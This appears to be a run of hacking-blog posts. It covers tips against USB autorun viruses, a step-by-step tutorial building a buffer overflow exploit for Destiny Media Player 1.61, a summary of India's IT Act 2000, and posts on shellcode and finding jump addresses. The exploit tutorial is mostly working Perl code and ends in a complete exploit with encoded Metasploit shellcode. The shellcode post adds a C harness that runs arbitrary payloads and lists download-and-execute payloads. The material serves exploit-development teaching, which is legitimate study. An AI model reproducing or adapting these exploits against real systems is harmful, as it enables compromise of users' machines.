Many viruses which propagate through removable drive e.g  USB drive, DVD etc. uses a file named autorun.inf to infect your PC. When you double click  the drive then the autorun.inf execute the virus exe to infect your computer.

2.  Always uncheck the option “Hide Extensions for known file types” in folder Options. Follow this simple step to uncheck this option

• Open control panel, go to Folder Options
• Click view tab then unchecked the Option “Hide Extensions for known file types”

• Click OK.

Reason:
I will show you an example of virus to clear my points. First of all check the option “Hide Extensions for known file types”

Now see this folder “msbackup” which is actually a virus.

As you have check option “Hide Extensions for known file types” , you will click on this folder and get infected from this virus. But, if you have unchecked the option then “Hide Extensions for known file types” then you will be able to see extenston exe as shown in the screenshot.

Now you can see a executable file with icon of folder then you should not run this type of file as they are virus.

3. You should also check option “Show Hidden files, folders and drives” and uncheck “Hide protected operating system files” as shown in the screenshot.

Reason:
Most of the virus change their attributes to Hidden and OS System files so we are not ale to see them in Windows Explorer. Now you can delete this virus if you are not infected with this virus.
If you are unable to delete then you are infected with this virus.

4. At last, you should use antivirus software like Avira Antivir Personal which is free for personal use and always update the anti virus.

5. We can also create a folder with name autorun.inf in every drive.
Reason: Due to this virus can’t create a file autorun.inf file.
Note: This works fine on Windows XP.

Hope you enjoyed this post , feel free to comment……Happy hacking!!!!!

What is Stack??

Stack is data structure which follows Last in First Out(LIFO). Stack contains local variable, function info and other details.
There are two operation possible on stack PUSH and POP.

Example:



This is a typical layout of stack when functions call are made in the program.



Consider this C Code

1
2
3
4
5
6
7
8
9

void DemoFunction(int parameter1, int parameter2)
{
     int localvar = 3;
}
int main()
{
    DemoFunction(1,2);
    return 0;
}

Stack looks like as shown below for this C code:

So when functions call are made then parameters of function, EIP EBP register and  local variable of function pushed onto to the stack. When function return then saved EIP is popped from the stack and put back into EIP and normal execution of program continues.

In the case of Buffer overflow, we overwrite the parameters, EIP and EBP. When function return EIP is popped from the stack and it contains the value which we have overwritten.  So by changing the value of EIP during overflow we change the normal execution of program and we can point EIP to our code address.



1.WinDbg : Windows Debugger

Install Windbg  (Full install) ,open cmd and change the current directory to “C:\Program Files\Debugging Tools for Windows (x86)”  and type windbg -I .
Open windbg, go to File–> Symbol File Path and enter “SRV*C:\symbols*http://msdl.microsoft.com/download/symbols”(C:\symbols is path of directory)

2.Perl : Strawbery perl for windows platform

3.Metasploit : Metasploit Framework

4. Download all the perl code used in this tutorial from this link.

So , let start to get our hand dirty..



1. Download Destiny Media Player 1.61 from this link.

2. Install this program on Windows XP Pro SP3.(exploit-db exploit works fine on XP SP2 En but it didn’t work on XP SP3).

3. Open notepad and write down the perl code as shown below:

1
2
3
4
5
6

my $file="radio1.rdl";
my $junkA="A"x4500;
open($FILE, ">$file");
print $FILE $junkA;
close($FILE);
print "rdl File Created successfully\n";

4. Save the file with name Exploit1.pl.

5. Open command prompt and enter perl Exploit1.pl.

6. This perl script creates the radio1.rdl with 4500 A character, when we double the click it opens in Destiny Media Player and application crashes.

So, now we will start our exploit development.



Click radio1.dll , it will open Windows debugger( or if you see debug button click on it).

We can see that EIP is overwriten with 41414141 (AAAAA) so due to overflow EIP(4 bytes)  is overwritten and so we can control the execution of program by modifying the value in EIP. But we don’t know the size of our buffer to exactly overwrite EIP with our own address.

Tip: Press q in command line in WinDbg to quit.

1. Open notepad and write down the perl code as shown below:

1
2
3
4
5
6
7
8
9

my $file="radio2.rdl";
my $junkA="A"x4000;
my $junkB = "B"x500;
open($FILE, ">$file");
# . concat the two variable
# file contains 4000 A's then 500 B's
print $FILE $junkA.$junkB;
close($FILE);
print "rdl File Created successfully\n";

2. Save the file with name Exploit2.pl.

3. Open command prompt and enter perl Exploit2.pl.

4. Double click the generated radio2.rdl file, it opens windows debugger.

But now EIP is overwritten with 42424242(BBBB) so now we know that the EIP has offset between 4000 and 4500 buffer size. When we dump esp using d esp command we are able to see remaining B’s.

Now we will find the exact offset in our buffer to overwrite EIP with Metasploit.

1. Open cygwin shell. Go to All Programs–> Metasploit 3–> Cygwin Shell.

2. Change the directory to msf3/tools

3. Create a pattern for 500 characters using pattern_create.rb ruby script as shown below.

4.  Open notepad and copy this perl code.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16

my $file="radio3.rdl";
my $junkA="A"x4000;
# . is used for concatenation
my $junkB="Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9".
"Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9".
"Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9".
"Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9".
"Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9".
"Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9".
"Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9".
"Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9".
"Aq0Aq1Aq2Aq3Aq4Aq5Aq";
open($FILE, ">$file");
print $FILE $junkA.$junkB;
close($FILE);
print "rdl File Created successfully\n";

5. Save this file as Exploit3.pl.

6. Open command prompt and enter perl Exploit3.pl.

7. Double click the generated radio3.rdl file, it opens windows debugger.

8. EIP is overwritten with 41346f41, now we will use Metasploit tool pattern_offset to calculate size of buffer to overwrite EIP.

9. Open cygwinshell and run the ruby script as shown below

10. Now if we will construct our buffer as 4000 + 432 A’s and “BBBB” then BBBB will overwrite EIP.

Buffer look like
[AAAAAAA ...... ][BBBB][CCCC....]
4432 A’s EIP 500 C’s

11. Open notepad, copy this perl code and save this file as Exploit4.pl. .

1
2
3
4
5
6
7
8

my $file="radio4.rdl";
my $junkA="A"x4432;
my $eip="BBBB";
my $junkC="C"x500;
open($FILE, ">$file");
print $FILE $junkA.$eip.$junkC;
close($FILE);
print "rdl File Created successfully\n";

12. Open command prompt and enter perl Exploit4.pl.

13. Double click the generated radio4.rdl file, it opens windows debugger.

EIP is overwritten with 4 B’s(42424242) so now we know the exact position in our buffer and esp is overwritten with C’s. We can put our shellcode instead of C’s and overwrite EIP to jump to the esp address.. But we don’t know exactly where first C start. So let’s find it out by changing the perl script.

1. Open notepad and copy this perl code and save it as Exploit5.pl

1
2
3
4
5
6
7
8

my $file="radio5.rdl";
my $junkA="A"x4432;
my $eip="BBBB";
my $junkC="A1234567890123456789B1234567890123456789C1234567890123456789D1234567890123456789E123456789F123456789G";
open($FILE, ">$file");
print $FILE $junkA.$eip.$junkC;
close($FILE);
print "rdl File Created successfully\n";

2 . Execute this perl script which creates radio5.rdl and double click the radio5.rdl and it open WinDbg.

In this case it starts exactly at start of esp at  00313c4c but if it doesn’t start then we need to put some NOP( no operation ) before shellcode.

1. We can easily generate shellcode with Metasploit. For more details to generate shellcode watch this Video tutorial.

2. So perl code with shellcode

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24

my $file="radio6.rdl";
my $junkA="A"x4432;
my $eip= "BBBB";
 
# windows/exec - 144 bytes
# http://www.metasploit.com
# Encoder: x86/shikata_ga_nai
# EXITFUNC=seh, CMD=calc
my $shellcode = "\xdb\xc0\x31\xc9\xbf\x7c\x16\x70\xcc\xd9\x74\x24\xf4\xb1" .
"\x1e\x58\x31\x78\x18\x83\xe8\xfc\x03\x78\x68\xf4\x85\x30" .
"\x78\xbc\x65\xc9\x78\xb6\x23\xf5\xf3\xb4\xae\x7d\x02\xaa" .
"\x3a\x32\x1c\xbf\x62\xed\x1d\x54\xd5\x66\x29\x21\xe7\x96" .
"\x60\xf5\x71\xca\x06\x35\xf5\x14\xc7\x7c\xfb\x1b\x05\x6b" .
"\xf0\x27\xdd\x48\xfd\x22\x38\x1b\xa2\xe8\xc3\xf7\x3b\x7a" .
"\xcf\x4c\x4f\x23\xd3\x53\xa4\x57\xf7\xd8\x3b\x83\x8e\x83" .
"\x1f\x57\x53\x64\x51\xa1\x33\xcd\xf5\xc6\xf5\xc1\x7e\x98" .
"\xf5\xaa\xf1\x05\xa8\x26\x99\x3d\x3b\xc0\xd9\xfe\x51\x61" .
"\xb6\x0e\x2f\x85\x19\x87\xb7\x78\x2f\x59\x90\x7b\xd7\x05" .
"\x7f\xe8\x7b\xca";
 
open($FILE, ">$file");
print $FILE $junkA.$eip.$shellcode;
close($FILE);
print "rdl File Created successfully\n";

3. Shellocde start at ESP so we can overwrite eip with the address of jmp esp or call esp etc. instruction and jump to our shellocode.

4. Generally we should find address to overwrite EIP in application dll as it make the exploit stable but in this case there is no application dll loaded. so, we will find address in OS dll like ntdll.dll,kernel32.dl,user32.dll etc.

5. For diiferent type of tools available to find address to overwrite EIP you can read this post How to find addresses to overwrite EIP??

6. I will use findjmp2 to find address in ntdll.dll

7. Now we can finalize our exploit with address 0x7C914663

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28

# Exploit for Destiny Media Player Version 1.61.0
# Tested On windows XP Sp3(En)
# Wriiten by Ayush (www.secsavvy.com)
 
my $file="radio6.rdl";
my $junkA="A"x4432;
my $eip= pack('V',0x7C914663);
 
# windows/exec - 144 bytes
# http://www.metasploit.com
# Encoder: x86/shikata_ga_nai
# EXITFUNC=seh, CMD=calc
my $shellcode = "\xdb\xc0\x31\xc9\xbf\x7c\x16\x70\xcc\xd9\x74\x24\xf4\xb1" .
"\x1e\x58\x31\x78\x18\x83\xe8\xfc\x03\x78\x68\xf4\x85\x30" .
"\x78\xbc\x65\xc9\x78\xb6\x23\xf5\xf3\xb4\xae\x7d\x02\xaa" .
"\x3a\x32\x1c\xbf\x62\xed\x1d\x54\xd5\x66\x29\x21\xe7\x96" .
"\x60\xf5\x71\xca\x06\x35\xf5\x14\xc7\x7c\xfb\x1b\x05\x6b" .
"\xf0\x27\xdd\x48\xfd\x22\x38\x1b\xa2\xe8\xc3\xf7\x3b\x7a" .
"\xcf\x4c\x4f\x23\xd3\x53\xa4\x57\xf7\xd8\x3b\x83\x8e\x83" .
"\x1f\x57\x53\x64\x51\xa1\x33\xcd\xf5\xc6\xf5\xc1\x7e\x98" .
"\xf5\xaa\xf1\x05\xa8\x26\x99\x3d\x3b\xc0\xd9\xfe\x51\x61" .
"\xb6\x0e\x2f\x85\x19\x87\xb7\x78\x2f\x59\x90\x7b\xd7\x05" .
"\x7f\xe8\x7b\xca";
 
open($FILE, ">$file");
print $FILE $junkA.$eip.$shellcode;
close($FILE);
print "rdl File Created successfully\n";

8. Double click radio6.rdl it launches calculator.

Congratz!!! You have successfully written exploit for Destiny media Player.

At last , I will thank Peter Van Eeckhoutte for excellent tutorial series on Exploit Writing.  If you are more interested on writing then you must visit Peter Van Blog for Exploit Writing tutorial.

Now that we have gone through many facets of hacking let us figure something out about the law governing Information Technology (IT) in India.

The cyber world is governed by the Information Technology Act, 2000 in India.

This statute was enacted in compliance with the model law on Electronic Commerce adopted by the United Nations General Assembly vide resolution No. A/RES/51/162, which recommends, inter alia, that all states give favourable consideration to the said Model Law when they enact or revise their laws relating to IT.

The act in its object clause states that it is “ An Act to provide legal recognition for transactions carried out by means of electronic data interchange and other means of electronic communication, commonly referred to as “electronic commerce”, which involve the use of alternatives to paper-based methods of communication and storage of information, to facilitate electronic filing of documents with the Government agencies and further to amend the Indian Penal Code, the Indian Evidence Act, 1872, the Bankers’ Books Evidence Act, 1891 and the Reserve Bank of India Act, 1934 and for matters connected therewith or incidental thereto.” However it deals with many more provisions relating to IT.

The major chapters under the act include:-

1. Definitions.
2. Electronic Governance.
3. Electronic Records.
4. Digital Signatures.
5. Certifying Authorities.
6. Cyber Regulations Appellate Tribunal.
7. Offences Related to Computers.
8. Miscellaneous Provisions.

Let us now go into some details of the aforestated provisions.

In the first Chapter of the Act, and under Section 2, there are definitions of various terms with are used under the act. The most important definitions covered under this chapter are:-

1. Under Section 2 (1)(a):- ‘Access’ “with its grammatical variations and cognate expressions means gaining entry into, instructing or communicating with the logical, arithmetical, or memory function resources of a computer, computer system or computer network;”
2. Under Section 2 (1)(d):-  ‘Affixing Digital Signature’ “with its grammatical variations and cognate expressions means adoption of any methodology or procedure by a person for the purpose of authenticating an electronic record by means of digital signature”
3. Under Section 2 (1)(f):- ‘Asymmetric crypto system’ means a system of a secure key pair consisting of a private key for creating a digital signature and a public key to verify the digital signature;
4. Under Section 2 (1)(i):- ‘Computer’ means any electronic magnetic, optical or other high-speed data processing device or system which performs logical, arithmetic, and memory functions by manipulations of electronic, magnetic or optical impulses, and includes all input, output, processing, storage, computer software, or communication facilities which are connected or related to the computer in a computer system or computer network;
5. Under Section 2 (1)(j):- ‘Computer Network’ means the interconnection of one or more computers through-
   • the use of satellite, microwave, terrestrial line or other communication media; and
   • terminals or a complex consisting of two or more interconnected computers whether or not the interconnection is continuously maintained.
6. Under Section 2 (1)(k):- ‘computer resource’ means computer, computer system, computer network, data, computer data base or software;
7. Under Section 2 (1)(l):- ‘computer system’ means a device or collection of devices, including input and output support devices and excluding calculators which are not programmable and capable of being used in conjunction with external files, which contain computer programmes, electronic instructions, input data and output data, that performs logic, arithmetic, data storage and retrieval, communication control and other functions;
8. Under Section 2 (1)(o):- ‘data’ means a representation of information, knowledge, facts, concepts or instructions which are being prepared or have been prepared in a formalized manner, and is intended to be processed, is being processed or has been processed in a computer system or computer network, and may be in any form (including computer printouts magnetic or optical storage media, punched cards, punched tapes) or stored internally in the memory of the computer;
9. Under Section 2 (1)(p):- ‘digital signature’ means authentication of any electronic record by a subscriber by means of an electronic method or procedure in accordance with the provisions of section 3;{Section 3 talks About Authentication of electronic records Defined below.}
10. Under Section 2 (1)(r):- ‘electronic form’ with reference to information means any information generated, sent, received or stored in media, magnetic, optical, computer memory, micro film, computer generated micro fiche or similar device;
11. Under Section 2 (1)(t):- ‘electronic record’ means data, record or data generated, image or sound stored, received or sent in an electronic form or micro film or computer generated micro fiche;
12. Under Section 2 (1)(u):- ‘function’, in relation to a computer, includes logic, control arithmetical process, deletion, storage and retrieval and communication or telecommunication from or within a computer;
13. Under Section 2 (1)(v):- ‘information’ includes data, text, images, sound, voice, codes, computer programmes, software and databases or micro film or computer generated micro fiche;

In Chapter III of the act it deals with e-Governance. The term Electronic Governance, most commonly referred as e-Governance means setting up an easy, cheap and transparent relationship among people and the government using the electronic media. Internet plays the most vital role in carrying out of e-Governance. In e-Government, people are linked with the government by the internet. Sections 4 to 10 deal with provisions like legal recognition of electronic records, legal recognition of digital signatures, retention of electronic records etc.

Chapter IV deals with Attribution, Acknowledgement and dispatch of electronic records.

Chapter VII talks about Digital Signature Certificates.

The main concern of common people using Computers or Computer systems is dealt with in Chapter XI where different kinds of Computer related offences have been defined and the penalty for such offence is prescribed. These crimes are often named as White Collar Crimes and mainly need intellect.

Section 66 (1) talks about Hacking with Computer System, it states that “Whoever with the intent to cause or knowing that he is likely to cause wrongful loss or damage to the public or any person destroys or deletes or alters any information residing in a computer resource or diminishes its value or utility or affects it injuriously by any means, commits hack.” Here due attention must be paid to the three words in bold i.e. destroys, deletes and alters. These three words have much more bigger ambit than it seems to a common man. These three kinds of actions can lead to theft, misappropriation, forgery, fraud, introduction of viruses, Trojan horses, logic bombs etc.  The persons committing such offences are referred to as Hackers. There are various kinds of hackers viz.

1. Code Hackers:- They know computer like their backyard and they can use the computer in any manner they wish.
2. Crackers:- They gain access into computer systems by circumventing operating systems’ security.
3. Phreakers:- They use their vast internet knowledge to hack.
4. CyberPunks:- They have expertise in Cryptography.

Section 66 (2) penalizes the offence of hacking with imprisonment up to three years and/or fine which may extend upto  two lakh rupees.

Section 67 deals with Pornography as an offence. It states that “Whoever publishes or transmits or causes to be published in the electronic form, any material which is lascivious or appeals to the prurient interest or if its effect is such as to tend to deprave and corrupt persons who are likely, having regard to all relevant circumstances, to read, see or hear the matter contained or embodied in it, shall be punished on first conviction with imprisonment of either description for a term which may extend to five years and with fine which may extend to one lakh rupees and in the event of a second or subsequent conviction with imprisonment of either description for a term which may extend to ten years and also with fine which may extend to two lakh rupees.”

Section 70 deals with Protected Systems. Sub-section 1 states that The appropriate Government may, by notification in the Official Gazette, declare that any computer, computer system or computer network to be a protected system and Sub-section 3 states that any person who secures access or attempts to secure access to a protected system in contravention of the provisions of this section shall be punished with imprisonment of either description for a term which may extend to ten years and shall also be liable to fine.

Section 76 talks about Confiscation, it states that Any computer, computer system, floppies, compact disks, tape drives or any other accessories related thereto, in respect of which any provision of this Act,  rules, orders or regulations made thereunder has been or is being contravened, shall be liable to confiscation.

The act gives a police officer not below the rank of Deputy Superintendent of Police authority to investigate any case relating to cyber crime under this act.

Under chapter XIII provisions like power of police officer to enter and search the premises where cyber crime is committed or is likely to be committed.

To conclude it can be commented that although there is a strict law governing different kinds of electronic crimes referred to as cyber crimes but they have not got due implementation nationwide. Although, there are laws to deal with serious cyber crimes but the administration lacks power to control and nab notorious criminals. In many areas and as evident in many cases, computers and internet experts have proved themselves as boons to the nation, but still we may find many people committing crimes using computers, many knowingly and many unknowingly. It is very important to know the laws relating to such offences and punishments on breaching those laws.

This is a guest article by Krishanu Ray. BSL,Diploma in Cyber Laws.

Shellcode is a small piece of code used as the payload in the exploitation of a software vulnerability.  It is called “shellcode” because it typically starts a  shell/command prompt  from which the attacker can control the compromised machine.  Shellcode is commonly written in machine code, but any piece of code that performs a similar task can be called shellcode. (Wikipedia)

1. Metasploit Framework
2.  Dev C++ ( or you can use different C compiler)

Using Metasploit we can easily generate a shellcode.

Watch this video for generating a shellcode and testing the shellcode with this simple C code.

1
2
3
4
5
6
7
8
9
10
11
12

unsigned char shellcode[] = "put your shellcode here";
int  main()
{
      // Function pointer points to the address of function.
      void (*shell)(); //Function pointer
      // Initializing a function pointer  with the address of a shellocde
      // & is optional
      shell= &shellcode;
      // Execute shellcode
      shell();
      return 0;
}

This is the list of some common shellcode( payloads):

• Windows Execute Command: Execute an arbitrary command
• Windows Meterpreter (skape/jt injection), Bind TCP Stager: Listen for a connection, Inject the meterpreter server DLL
• Windows Executable Download and Execute: Download an EXE from a HTTP URL and execute it
• Windows VNC Inject (skape/jt injection), Bind TCP Stagerem>: Listen for a connection, Inject the VNC server DLL and run it from memory

Generally EIP is overwritten with the address of instructions like jmp esp, call , push ret etc. which point to our shellcode.


We can find the addresses using findjmp2, windbg, memdump etc.

1. Findjmp2

This program will find addresses suitable to overwrite EIP that will return to our code.

It currently supports looking for:

• jmp reg
• call reg
• push reg,  ret
• pop, pop, ret

You can download this program from this link Findjmp2
Usage:   findjmp <dllname> <reg>


Example:

2. Memdump

Memdump is used to dump the entire memory of running process.The directory created by memdump can be used with msfpescan to quickly find viable instructions
and return addresses.
You can find memdump in Metasploit tool folder in this location “C:\Program Files\Metasploit\Framework3\msf3\tools\memdump”.
Download link for Metasploit.

Usage:  Memdump <process id> <dump directory>

How to find process id??

1. Open windows Task manager (ctrl + alt + del).
2. Go to View->Select Columns.
3. Select PID(process id) checkbox, click ok.

Now we can see the PID of all the process.

We need a create a directory for dump. We will dump the memory of firefox.exe of PID 1800.

Example:

Now we will run msfpescan on memory dump of firefox.

1. Copy the dump directory C:\firefox to C:\Program Files\Metasploit\Framework3\home\Administrator\
2. Open cygwin shell. Go to All Programs–> Metasploit 3–> Cygwin Shell
3. Type following commands

Piping the output to output.txt file.

3. msfpescan

This can also be used looking for following pattern:

• jmp reg
• call reg
• push reg, ret
• pop, pop, ret

1. Open cygwin shell and change the directory to msf3
2. Copy the dll to C:\Program Files\Metasploit\Framework3\home\Administrator\
3. Run the following commands as shown below:

For finding addresses of pattern for jmp reg, call reg, push reg ret

For finding addresses of pattern for pop pop ret